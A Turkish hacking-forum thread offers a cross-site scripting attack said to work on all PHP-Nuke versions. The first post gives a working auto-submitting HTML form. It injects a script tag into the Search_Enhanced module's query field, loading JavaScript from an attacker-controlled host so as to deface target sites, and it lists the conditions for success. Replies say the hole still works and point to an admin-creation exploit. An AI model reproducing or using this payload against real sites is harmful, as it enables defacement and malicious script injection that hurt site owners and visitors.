Phpnuke All Version Açigi
-
Evet arkadaslar simdi size tüm php nuke sürümlerinde çalisan hatta php nukenin kendi sitesi bile index yedi bu açikla =) açik daha yayilmadi kimsenin haberi yok ama ben sizlerle paylaşıyorum.
sözüne edilen açik herhangi site üzerinden js kod çalistirmaniza yariyor
Iste kodlar;
<html>
Evet arkadaslar bu kodlarda site.com yazan yere hacklemek istediginiz php nuke kullanan sitenin adini yazin ve sizinjskodunolduguadres yazan yere ise herhangi bir js kod hazirlayin ve hacked falan yazin ve oranin l inkini verdikten sonra bu dosyayi . html olarak kaydedin ve html dosyasi açtigimizda
<form name=searchform method=post action=http://site.com/modules.php?op=modload&name=Searc h_Enhanced&file=index>
<input type="text" name="query" size="15" value='<script src=http://sizinjskodunolduguadres/js.js></script>' >
<input type=submit name=sub>
<script>document.searchform.sub.click()</script>
</html>Sorguyu Gönder diyerek Index atabiliriz ve sözülen edilen js yi çagirabiliriz =)
Sitede mantik olarak su kodu Kullaniyor;
<script src=http://www.site.com/js.js></script>
ve Bu kod siteyi js.js olarak verilen adresteki js yi çagiriyor.
selametle...
-
Biraz Bilgi Vereyim.Çalismasi Için;
1 - Modload Modülünün Kurulu ve Aktif Olmasi Gerekmektedir.
2 - HTML Kodlarinin Yasaklanmamis Olmasi Gerekiyor.
3- NukeSentinel , AdminSecure Gibi Güvenlik Yazilimlarinin Kurulu Oldugu Sitelerde Hiç Denemeyin Çalismaz.4- Her sitede olcak diye bir şart yok önlem almış olabilir (ama açıgı geliştirebilirsinz)
-
bu açık çok eski bi açık :S..
-
Arkadaşım güzel bir çalışma ama alıntı yazmayı uunutmuşsun :)) eski bir acık olabilir ama hala işe yarıyor ya bu yontem yada admin oluşturma exoploiti ile oho nuke hackleyeblirsiniz ;)
-
2 - HTML Kodlarinin Yasaklanmamis Olmasi Gerekiyor.
:D Oldu canım
-
+ Add Lammer Tools :)
-
Len bende ürktüm yenimi açık diye :)) bi bk a yaramaz bu dayı siz forum açığı deneyin şahsen ben 3 defa yemiş biri olarak çünkü nuke kullanan adam forumu güncellemeye üşenir çünkü eklentileri gider ben şahsen öyleydim ama bir gün geldiğimde foruma tıklayınca karıları karşımda görünce son sürüme yükselttim :)
